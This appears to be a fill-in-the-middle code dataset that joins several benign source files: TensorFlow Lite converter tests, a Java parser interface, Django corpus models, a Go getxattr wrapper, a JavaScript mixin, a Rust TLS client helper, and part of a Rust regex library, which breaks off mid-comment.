'wb') as temp_file: temp_file.write('bad data') temp_file.flush() # Attempts to convert the invalid model. with self.assertRaises(IOError) as error: lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'], ['add']) self.assertEqual( 'Unable to parse input file \'{}\'.'.format(graph_def_file), str(error.exception)) # TODO(nupurgarg): Test model loading in open source. def _initObjectDetectionArgs(self): # Initializes the arguments required for the object detection model. self._graph_def_file = resource_loader.get_path_to_datafile( 'testdata/tflite_graph.pb') self._input_arrays = ['normalized_input_image_tensor'] self._output_arrays = [ 'TFLite_Detection_PostProcess', 'TFLite_Detection_PostProcess:1', 'TFLite_Detection_PostProcess:2', 'TFLite_Detection_PostProcess:3' ] self._input_shapes = {'normalized_input_image_tensor': [1, 300, 300, 3]} def testTFLiteGraphDef(self): # Tests the object detection model that cannot be loaded in TensorFlow. self._initObjectDetectionArgs() converter = lite.TocoConverter.from_frozen_graph( self._graph_def_file, self._input_arrays, self._output_arrays, self._input_shapes) converter.allow_custom_ops = True tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('normalized_input_image_tensor', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 300, 300, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(4, len(output_details)) self.assertEqual('TFLite_Detection_PostProcess', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 10, 4] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) self.assertEqual('TFLite_Detection_PostProcess:1', output_details[1]['name']) self.assertTrue(([1, 10] == output_details[1]['shape']).all()) self.assertEqual('TFLite_Detection_PostProcess:2', output_details[2]['name']) self.assertTrue(([1, 10] == output_details[2]['shape']).all()) self.assertEqual('TFLite_Detection_PostProcess:3', output_details[3]['name']) self.assertTrue(([1] == output_details[3]['shape']).all()) def testTFLiteGraphDefMissingShape(self): # Tests invalid cases for the model that cannot be loaded in TensorFlow. self._initObjectDetectionArgs() # Missing `input_shapes`. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_frozen_graph( self._graph_def_file, self._input_arrays, self._output_arrays) self.assertEqual('input_shapes must be defined for this model.', str(error.exception)) def testTFLiteGraphDefInvalidShape(self): # Tests invalid cases for the model that cannot be loaded in TensorFlow. self._initObjectDetectionArgs() # `input_shapes` does not contain the names in `input_arrays`. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_frozen_graph( self._graph_def_file, self._input_arrays, self._output_arrays, input_shapes={'invalid-value': [1, 19]}) self.assertEqual( 'input_shapes must contain a value for each item in input_array.', str(error.exception)) class FromSavedModelTest(test_util.TensorFlowTestCase): def _createSavedModel(self, shape): """Create a simple SavedModel.""" saved_model_dir = os.path.join(self.get_temp_dir(), 'simple_savedmodel') with session.Session() as sess: in_tensor_1 = array_ops.placeholder( shape=shape, dtype=dtypes.float32, name='inputB') in_tensor_2 = array_ops.placeholder( shape=shape, dtype=dtypes.float32, name='inputA') out_tensor = in_tensor_1 + in_tensor_2 inputs = {'x': in_tensor_1, 'y': in_tensor_2} outputs = {'z': out_tensor} saved_model.simple_save(sess, saved_model_dir, inputs, outputs) return saved_model_dir def testSimpleModel(self): """Test a SavedModel.""" saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3]) # Convert model and ensure model is not None. converter = lite.TocoConverter.from_saved_model(saved_model_dir) tflite_model = converter.convert() self.assertTrue(tflite_model) interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testNoneBatchSize(self): """Test a SavedModel, with None in input tensor's shape.""" saved_model_dir = self._createSavedModel(shape=[None, 16, 16, 3]) converter = lite.TocoConverter.from_saved_model(saved_model_dir) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testOrderInputArrays(self): """Test a SavedModel ordering of input arrays.""" saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3]) converter = lite.TocoConverter.from_saved_model( saved_model_dir, input_arrays=['inputB', 'inputA']) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('inputA', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('inputB', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('add', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) def testSubsetInputArrays(self): """Test a SavedModel with a subset of the input array names of the model.""" saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3]) # Check case where input shape is given. converter = lite.TocoConverter.from_saved_model( saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': [1, 16, 16, 3]}) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check case where input shape is None. converter = lite.TocoConverter.from_saved_model( saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': None}) tflite_model = converter.convert() self.assertTrue(tflite_model) class FromKerasFile(test_util.TensorFlowTestCase): def setUp(self): keras.backend.clear_session() def _getSequentialModel(self): with session.Session().as_default(): model = keras.models.Sequential() model.add(keras.layers.Dense(2, input_shape=(3,))) model.add(keras.layers.RepeatVector(3)) model.add(keras.layers.TimeDistributed(keras.layers.Dense(3))) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.categorical_accuracy], sample_weight_mode='temporal') x = np.random.random((1, 3)) y = np.random.random((1, 3, 3)) model.train_on_batch(x, y) model.predict(x) try: fd, keras_file = tempfile.mkstemp('.h5') keras.models.save_model(model, keras_file) finally: os.close(fd) return keras_file def testSequentialModel(self): """Test a Sequential tf.keras model with default inputs.""" keras_file = self._getSequentialModel() converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check tensor details of converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('dense_input', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('time_distributed/Reshape_1', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # Check inference of converted model. input_data = np.array([[1, 2, 3]], dtype=np.float32) interpreter.set_tensor(input_details[0]['index'], input_data) interpreter.invoke() tflite_result = interpreter.get_tensor(output_details[0]['index']) keras_model = keras.models.load_model(keras_file) keras_result = keras_model.predict(input_data) np.testing.assert_almost_equal(tflite_result, keras_result, 5) os.remove(keras_file) def testSequentialModelInputArray(self): """Test a Sequential tf.keras model testing input arrays argument.""" keras_file = self._getSequentialModel() # Invalid input array raises error. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_keras_model_file( keras_file, input_arrays=['invalid-input']) self.assertEqual("Invalid tensors 'invalid-input' were found.", str(error.exception)) # Valid input array. converter = lite.TocoConverter.from_keras_model_file( keras_file, input_arrays=['dense_input']) tflite_model = converter.convert() os.remove(keras_file) self.assertTrue(tflite_model) def testSequentialModelInputShape(self): """Test a Sequential tf.keras model testing input shapes argument.""" keras_file = self._getSequentialModel() # Passing in shape of invalid input array has no impact as long as all input # arrays have a shape. converter = lite.TocoConverter.from_keras_model_file( keras_file, input_shapes={'invalid-input': [2, 3]}) tflite_model = converter.convert() self.assertTrue(tflite_model) # Passing in shape of valid input array. converter = lite.TocoConverter.from_keras_model_file( keras_file, input_shapes={'dense_input': [2, 3]}) tflite_model = converter.convert() os.remove(keras_file) self.assertTrue(tflite_model) # Check input shape from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('dense_input', input_details[0]['name']) self.assertTrue(([2, 3] == input_details[0]['shape']).all()) def testSequentialModelOutputArray(self): """Test a Sequential tf.keras model testing output arrays argument.""" keras_file = self._getSequentialModel() # Invalid output array raises error. with self.assertRaises(ValueError) as error: lite.TocoConverter.from_keras_model_file( keras_file, output_arrays=['invalid-output']) self.assertEqual("Invalid tensors 'invalid-output' were found.", str(error.exception)) # Valid output array. converter = lite.TocoConverter.from_keras_model_file( keras_file, output_arrays=['time_distributed/Reshape_1']) tflite_model = converter.convert() os.remove(keras_file) self.assertTrue(tflite_model) def testFunctionalModel(self): """Test a Functional tf.keras model with default inputs.""" with session.Session().as_default(): inputs = keras.layers.Input(shape=(3,), name='input') x = keras.layers.Dense(2)(inputs) output = keras.layers.Dense(3)(x) model = keras.models.Model(inputs, output) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.categorical_accuracy]) x = np.random.random((1, 3)) y = np.random.random((1, 3)) model.train_on_batch(x, y) model.predict(x) fd, keras_file = tempfile.mkstemp('.h5') try: keras.models.save_model(model, keras_file) finally: os.close(fd) # Convert to TFLite model. converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check tensor details of converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('input', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('dense_1/BiasAdd', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # Check inference of converted model. input_data = np.array([[1, 2, 3]], dtype=np.float32) interpreter.set_tensor(input_details[0]['index'], input_data) interpreter.invoke() tflite_result = interpreter.get_tensor(output_details[0]['index']) keras_model = keras.models.load_model(keras_file) keras_result = keras_model.predict(input_data) np.testing.assert_almost_equal(tflite_result, keras_result, 5) os.remove(keras_file) def testFunctionalModelMultipleInputs(self): """Test a Functional tf.keras model with multiple inputs and outputs.""" with session.Session().as_default(): a = keras.layers.Input(shape=(3,), name='input_a') b = keras.layers.Input(shape=(3,), name='input_b') dense = keras.layers.Dense(4, name='dense') c = dense(a) d = dense(b) e = keras.layers.Dropout(0.5, name='dropout')(c) model = keras.models.Model([a, b], [d, e]) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.mae], loss_weights=[1., 0.5]) input_a_np = np.random.random((10, 3)) input_b_np = np.random.random((10, 3)) output_d_np = np.random.random((10, 4)) output_e_np = np.random.random((10, 4)) model.train_on_batch([input_a_np, input_b_np], [output_d_np, output_e_np]) model.predict([input_a_np, input_b_np], batch_size=5) fd, keras_file = tempfile.mkstemp('.h5') try: keras.models.save_model(model, keras_file) finally: os.close(fd) # Convert to TFLite model. converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) os.remove(keras_file) # Check values from converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(2, len(input_details)) self.assertEqual('input_a', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) self.assertEqual('input_b', input_details[1]['name']) self.assertEqual(np.float32, input_details[1]['dtype']) self.assertTrue(([1, 3] == input_details[1]['shape']).all()) self.assertEqual((0., 0.), input_details[1]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(2, len(output_details)) self.assertEqual('dense_1/BiasAdd', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 4] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) self.assertEqual('dropout/Identity', output_details[1]['name']) self.assertEqual(np.float32, output_details[1]['dtype']) self.assertTrue(([1, 4] == output_details[1]['shape']).all()) self.assertEqual((0., 0.), output_details[1]['quantization']) def testFunctionalSequentialModel(self): """Test a Functional tf.keras model containing a Sequential model.""" with session.Session().as_default(): model = keras.models.Sequential() model.add(keras.layers.Dense(2, input_shape=(3,))) model.add(keras.layers.RepeatVector(3)) model.add(keras.layers.TimeDistributed(keras.layers.Dense(3))) model = keras.models.Model(model.input, model.output) model.compile( loss=keras.losses.MSE, optimizer=keras.optimizers.RMSprop(), metrics=[keras.metrics.categorical_accuracy], sample_weight_mode='temporal') x = np.random.random((1, 3)) y = np.random.random((1, 3, 3)) model.train_on_batch(x, y) model.predict(x) model.predict(x) fd, keras_file = tempfile.mkstemp('.h5') try: keras.models.save_model(model, keras_file) finally: os.close(fd) # Convert to TFLite model. converter = lite.TocoConverter.from_keras_model_file(keras_file) tflite_model = converter.convert() self.assertTrue(tflite_model) # Check tensor details of converted model. interpreter = Interpreter(model_content=tflite_model) interpreter.allocate_tensors() input_details = interpreter.get_input_details() self.assertEqual(1, len(input_details)) self.assertEqual('dense_input', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 3] == input_details[0]['shape']).all()) self.assertEqual((0., 0.), input_details[0]['quantization']) output_details = interpreter.get_output_details() self.assertEqual(1, len(output_details)) self.assertEqual('time_distributed/Reshape_1', output_details[0]['name']) self.assertEqual(np.float32, output_details[0]['dtype']) self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all()) self.assertEqual((0., 0.), output_details[0]['quantization']) # Check inference of converted model. input_data = np.array([[1, 2, 3]], dtype=np.float32) interpreter.set_tensor(input_details[0]['index'], input_data) interpreter.invoke() tflite_result = interpreter.get_tensor(output_details[0]['index']) keras_model = keras.models.load_model(keras_file) keras_result = keras_model.predict(input_data) np.testing.assert_almost_equal(tflite_result, keras_result, 5) os.remove(keras_file) if __name__ == '__main__': test.main()<|fim▁end|>
self.assertEqual('Placeholder', input_details[0]['name']) self.assertEqual(np.float32, input_details[0]['dtype']) self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
<|file_name|>Parser.java<|end_file_name|><|fim▁begin|>package com.real.estate.parser; import org.jsoup.nodes.Element; import java.util.List; /** * Created by Snayki on 22.03.2016. */ public interface Parser<T> {<|fim▁hole|>}<|fim▁end|>
List<Element> parse(); T createFromElement(Element element);
<|file_name|>models.py<|end_file_name|><|fim▁begin|>import operator from django.db import models from django.db.models import Q from django.db.models import Count from caching.base import CachingManager, CachingMixin from emoticonvis.apps.base import models as base_models from emoticonvis.apps.corpus import utils import numpy class Dataset(models.Model): """A top-level dataset object containing messages.""" name = models.CharField(max_length=150) """The name of the dataset""" description = models.TextField() """A description of the dataset.""" created_at = models.DateTimeField(auto_now_add=True) """The :py:class:`datetime.datetime` when the dataset was created.""" start_time = models.DateTimeField(null=True, default=None, blank=True) """The time of the first real message in the dataset""" end_time = models.DateTimeField(null=True, default=None, blank=True) """The time of the last real message in the dataset""" @property def message_count(self): return self.message_set.count() def __unicode__(self): return self.name<|fim▁hole|> def get_messages_from_selected_participants(self): return self.messages.filter(participant__is_selected=True).distinct() def get_emoticons_from_selected_participants(self): return Emoticon.objects.filter(messages__participant__is_selected=True).distinct() class Emoticon(models.Model): """A code of a message""" text = base_models.Utf8CharField(max_length=200) """The text of the emoticon""" VALENCE_CHOICES = ( ('P', 'Positive'), ('N', 'Negative'), ('O', 'Neutral'), ('U', 'Unknown'), ) valence = models.CharField(max_length=1, choices=VALENCE_CHOICES, default='U') def __repr__(self): return self.text def __unicode__(self): return self.__repr__() class Participant(models.Model): """A code of a message""" dataset = models.ForeignKey(Dataset, default=1) """Which :class:`Dataset` the message belongs to""" name = models.CharField(max_length=100, blank=True) """The name of the participant""" LANG_CHOICES = ( ('No', 'Not specified'), ('En', 'English'), ('Fr', 'French'), ) language = models.CharField(max_length=2, choices=LANG_CHOICES, default='No') STATUS_CHOICES = ( ('No', 'Not specified'), ('Jr', 'Junior'), ('Sr', 'Senior'), ) status = models.CharField(max_length=2, choices=STATUS_CHOICES, default='No') position = models.CharField(max_length=32, default=None, null=True) is_selected = models.BooleanField(default=True) def __repr__(self): return self.text def __unicode__(self): return self.__repr__() class LanguageSession(models.Model): """ A language session is a continuous time period when participants in the session stay the same """ dataset = models.ForeignKey(Dataset) """Which :class:`Dataset` the message belongs to""" start_time = models.DateTimeField(null=True, blank=True, default=None) """The :py:class:`datetime.datetime` (in UTC) when the language session starts""" end_time = models.DateTimeField(null=True, blank=True, default=None) """The :py:class:`datetime.datetime` (in UTC) when the language session ends""" participants = models.ManyToManyField(Participant, related_name="lang_sessions") num_en = models.IntegerField(default=0) num_fr = models.IntegerField(default=0) en_proportion = models.FloatField(default=0) TYPE_CHOICES = ( ('E only', 'E only'), ('major E', 'major E'), ('major F', 'major F'), ('F only', 'F only'), ('Empty', 'Empty') ) type = models.CharField(max_length=8, choices=TYPE_CHOICES, default=None, null=True) class Message(models.Model): """ The Message is the central data entity for the dataset. """ dataset = models.ForeignKey(Dataset) """Which :class:`Dataset` the message belongs to""" idx = models.IntegerField(null=True, blank=True, default=None) """The index of the message""" time = models.DateTimeField(null=True, blank=True, default=None) """The :py:class:`datetime.datetime` (in UTC) when the message was sent""" session_id = models.IntegerField(null=True, blank=True, default=None) """The session of the message""" TYPE_CHOICES = ( (0, 'Normal message'), (1, 'Someone joined'), (2, 'Someone left'), (3, 'Bert message'), (4, 'Starting log'), ) type = models.IntegerField(max_length=1, choices=TYPE_CHOICES, default=0) participant = models.ForeignKey(Participant, related_name="messages", default=None, null=True) text = base_models.Utf8TextField(null=True, blank=True, default="") """The actual text of the message.""" emoticons = models.ManyToManyField(Emoticon, related_name="messages") lang_session = models.ForeignKey(LanguageSession, related_name="messages", default=None, null=True) LANG_CHOICES = ( ('No', 'Not specified'), ('En', 'English'), ('Fr', 'French'), ) detected_language = models.CharField(max_length=2, choices=LANG_CHOICES, default='No') def __repr__(self): return self.text def __unicode__(self): return self.__repr__()<|fim▁end|>
<|file_name|>unionfs_xattr_test_darwin.go<|end_file_name|><|fim▁begin|>// Copyright 2016 the Go-FUSE Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package unionfs import ( "syscall" "unsafe" ) // Darwin doesn't have support for syscall.Getxattr() so we pull it into its own file and implement it by hand on Darwin. func Getxattr(path string, attr string, dest []byte) (sz int, err error) { var _p0 *byte _p0, err = syscall.BytePtrFromString(path) if err != nil { return } var _p1 *byte _p1, err = syscall.BytePtrFromString(attr) if err != nil { return } var _p2 unsafe.Pointer if len(dest) > 0 { _p2 = unsafe.Pointer(&dest[0]) } else { var _zero uintptr _p2 = unsafe.Pointer(&_zero) } r0, _, e1 := syscall.Syscall6(syscall.SYS_GETXATTR, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), uintptr(_p2), uintptr(len(dest)), 0, 0) sz = int(r0)<|fim▁hole|>}<|fim▁end|>
if e1 != 0 { err = e1 } return
<|file_name|>NamingMixin.js<|end_file_name|><|fim▁begin|>const NamingMixin = { _name: null, getName() { return this._name; },<|fim▁hole|> _shortName: null, getShortName() { return this._shortName || this.getName(); }, _abbreviation: null, getAbbreviation() { return this._abbreviation || this.getShortName(); }, }; export default NamingMixin;<|fim▁end|>
<|file_name|>http.rs<|end_file_name|><|fim▁begin|>use hyper::Client; use hyper::net::HttpsConnector; use hyper_native_tls::NativeTlsClient; error_chain!{ errors {<|fim▁hole|> } } pub fn tls_client() -> Result<Client> { let ssl = NativeTlsClient::new().chain_err(|| ErrorKind::FailedToCreateTlsClient)?; let connector = HttpsConnector::new(ssl); let client = Client::with_connector(connector); Ok(client) }<|fim▁end|>
FailedToCreateTlsClient { description("Failed to create TLS client") display("Failed to create TLS client") }
<|file_name|>re.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. use collections::HashMap; use std::fmt; use std::from_str::from_str; use std::str::{MaybeOwned, Owned, Slice}; use compile::Program; use parse; use vm; use vm::{CaptureLocs, MatchKind, Exists, Location, Submatches}; /// Escapes all regular expression meta characters in `text` so that it may be /// safely used in a regular expression as a literal string. pub fn quote(text: &str) -> StrBuf { let mut quoted = StrBuf::with_capacity(text.len()); for c in text.chars() { if parse::is_punct(c) { quoted.push_char('\\') } quoted.push_char(c); } quoted } /// Tests if the given regular expression matches somewhere in the text given. /// /// If there was a problem compiling the regular expression, an error is /// returned. /// /// To find submatches, split or replace text, you'll need to compile an /// expression first. /// /// Note that you should prefer the `regex!` macro when possible. For example, /// `regex!("...").is_match("...")`. pub fn is_match(regex: &str, text: &str) -> Result<bool, parse::Error> { Regex::new(regex).map(|r| r.is_match(text)) } /// Regex is a compiled regular expression, represented as either a sequence /// of bytecode instructions (dynamic) or as a specialized Rust function /// (native). It can be used to search, split /// or replace text. All searching is done with an implicit `.*?` at the /// beginning and end of an expression. To force an expression to match the /// whole string (or a prefix or a suffix), you must use an anchor like `^` or /// `$` (or `\A` and `\z`). /// /// While this crate will handle Unicode strings (whether in the regular /// expression or in the search text), all positions returned are **byte /// indices**. Every byte index is guaranteed to be at a UTF8 codepoint /// boundary. /// /// The lifetimes `'r` and `'t` in this crate correspond to the lifetime of a /// compiled regular expression and text to search, respectively. /// /// The only methods that allocate new strings are the string replacement /// methods. All other methods (searching and splitting) return borrowed /// pointers into the string given. /// /// # Examples /// /// Find the location of a US phone number: /// /// ```rust /// # use regex::Regex; /// let re = match Regex::new("[0-9]{3}-[0-9]{3}-[0-9]{4}") { /// Ok(re) => re, /// Err(err) => fail!("{}", err), /// }; /// assert_eq!(re.find("phone: 111-222-3333"), Some((7, 19))); /// ``` /// /// You can also use the `regex!` macro to compile a regular expression when /// you compile your program: /// /// ```rust /// #![feature(phase)] /// extern crate regex; /// #[phase(syntax)] extern crate regex_macros; /// /// fn main() { /// let re = regex!(r"\d+"); /// assert_eq!(re.find("123 abc"), Some((0, 3))); /// } /// ``` /// /// Given an incorrect regular expression, `regex!` will cause the Rust /// compiler to produce a compile time error. /// Note that `regex!` will compile the expression to native Rust code, which /// makes it much faster when searching text. /// More details about the `regex!` macro can be found in the `regex` crate /// documentation. #[deriving(Clone)] #[allow(visible_private_types)] pub struct Regex { /// The representation of `Regex` is exported to support the `regex!` /// syntax extension. Do not rely on it. /// /// See the comments for the `program` module in `lib.rs` for a more /// detailed explanation for what `regex!` requires. #[doc(hidden)] pub original: StrBuf, #[doc(hidden)] pub names: Vec<Option<StrBuf>>, #[doc(hidden)] pub p: MaybeNative, } impl fmt::Show for Regex { /// Shows the original regular expression. fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.original) } } pub enum MaybeNative { Dynamic(Program), Native(fn(MatchKind, &str, uint, uint) -> Vec<Option<uint>>), } impl Clone for MaybeNative { fn clone(&self) -> MaybeNative { match *self { Dynamic(ref p) => Dynamic(p.clone()), Native(fp) => Native(fp), } } } impl Regex { /// Compiles a dynamic regular expression. Once compiled, it can be /// used repeatedly to search, split or replace text in a string. /// /// When possible, you should prefer the `regex!` macro since it is /// safer and always faster. /// /// If an invalid expression is given, then an error is returned. pub fn new(re: &str) -> Result<Regex, parse::Error> { let ast = try!(parse::parse(re)); let (prog, names) = Program::new(ast); Ok(Regex { original: re.to_strbuf(), names: names, p: Dynamic(prog), }) } /// Returns true if and only if the regex matches the string given. /// /// # Example /// /// Test if some text contains at least one word with exactly 13 /// characters: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let text = "I categorically deny having triskaidekaphobia."; /// let matched = regex!(r"\b\w{13}\b").is_match(text); /// assert!(matched); /// # } /// ``` pub fn is_match(&self, text: &str) -> bool { has_match(&exec(self, Exists, text)) } /// Returns the start and end byte range of the leftmost-first match in /// `text`. If no match exists, then `None` is returned. /// /// Note that this should only be used if you want to discover the position /// of the match. Testing the existence of a match is faster if you use /// `is_match`. /// /// # Example /// /// Find the start and end location of every word with exactly 13 /// characters: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let text = "I categorically deny having triskaidekaphobia."; /// let pos = regex!(r"\b\w{13}\b").find(text); /// assert_eq!(pos, Some((2, 15))); /// # } /// ``` pub fn find(&self, text: &str) -> Option<(uint, uint)> { let caps = exec(self, Location, text); if has_match(&caps) { Some((caps.get(0).unwrap(), caps.get(1).unwrap())) } else { None } } /// Returns an iterator for each successive non-overlapping match in /// `text`, returning the start and end byte indices with respect to /// `text`. /// /// # Example /// /// Find the start and end location of the first word with exactly 13 /// characters: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let text = "Retroactively relinquishing remunerations is reprehensible."; /// for pos in regex!(r"\b\w{13}\b").find_iter(text) { /// println!("{}", pos); /// } /// // Output: /// // (0, 13) /// // (14, 27) /// // (28, 41) /// // (45, 58) /// # } /// ``` pub fn find_iter<'r, 't>(&'r self, text: &'t str) -> FindMatches<'r, 't> { FindMatches { re: self, search: text, last_end: 0, last_match: None, } } /// Returns the capture groups corresponding to the leftmost-first /// match in `text`. Capture group `0` always corresponds to the entire /// match. If no match is found, then `None` is returned. /// /// You should only use `captures` if you need access to submatches. /// Otherwise, `find` is faster for discovering the location of the overall /// match. /// /// # Examples /// /// Say you have some text with movie names and their release years, /// like "'Citizen Kane' (1941)". It'd be nice if we could search for text /// looking like that, while also extracting the movie name and its release /// year separately. /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"'([^']+)'\s+\((\d{4})\)"); /// let text = "Not my favorite movie: 'Citizen Kane' (1941)."; /// let caps = re.captures(text).unwrap(); /// assert_eq!(caps.at(1), "Citizen Kane"); /// assert_eq!(caps.at(2), "1941"); /// assert_eq!(caps.at(0), "'Citizen Kane' (1941)"); /// # } /// ``` /// /// Note that the full match is at capture group `0`. Each subsequent /// capture group is indexed by the order of its opening `(`. /// /// We can make this example a bit clearer by using *named* capture groups: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"'(?P<title>[^']+)'\s+\((?P<year>\d{4})\)"); /// let text = "Not my favorite movie: 'Citizen Kane' (1941)."; /// let caps = re.captures(text).unwrap(); /// assert_eq!(caps.name("title"), "Citizen Kane"); /// assert_eq!(caps.name("year"), "1941"); /// assert_eq!(caps.at(0), "'Citizen Kane' (1941)"); /// # } /// ``` /// /// Here we name the capture groups, which we can access with the `name` /// method. Note that the named capture groups are still accessible with /// `at`. /// /// The `0`th capture group is always unnamed, so it must always be /// accessed with `at(0)`. pub fn captures<'t>(&self, text: &'t str) -> Option<Captures<'t>> { let caps = exec(self, Submatches, text); Captures::new(self, text, caps) } /// Returns an iterator over all the non-overlapping capture groups matched /// in `text`. This is operationally the same as `find_iter` (except it /// yields information 